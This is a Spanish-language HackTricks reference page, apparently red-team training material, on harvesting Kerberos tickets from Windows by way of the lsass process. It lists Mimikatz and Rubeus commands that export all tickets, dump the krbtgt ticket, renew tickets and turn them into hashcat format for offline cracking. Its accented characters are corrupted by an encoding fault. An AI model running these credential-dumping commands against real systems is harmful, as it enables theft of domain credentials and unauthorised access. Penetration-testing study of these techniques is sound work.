Harvesting tickets from Windows
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Los tickets en Windows son gestionados y almacenados por el proceso lsass (Local Security Authority Subsystem Service), responsable de manejar las pol铆ticas de seguridad. Para extraer estos tickets, es necesario interactuar con el proceso lsass. Un usuario no administrativo solo puede acceder a sus propios tickets, mientras que un administrador tiene el privilegio de extraer todos los tickets en el sistema. Para tales operaciones, las herramientas Mimikatz y Rubeus son ampliamente empleadas, cada una ofreciendo diferentes comandos y funcionalidades.
Mimikatz
Mimikatz es una herramienta vers谩til que puede interactuar con la seguridad de Windows. Se utiliza no solo para extraer tickets, sino tambi茅n para varias otras operaciones relacionadas con la seguridad.
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
Rubeus
Rubeus es una herramienta espec铆ficamente dise帽ada para la interacci贸n y manipulaci贸n de Kerberos. Se utiliza para la extracci贸n y manejo de tickets, as铆 como para otras actividades relacionadas con Kerberos.
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
Al usar estos comandos, aseg煤rese de reemplazar los marcadores de posici贸n como <BASE64_TICKET>
y <luid>
con el ticket codificado en Base64 y el ID de inicio de sesi贸n reales, respectivamente. Estas herramientas ofrecen una funcionalidad extensa para gestionar tickets e interactuar con los mecanismos de seguridad de Windows.
Referencias
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.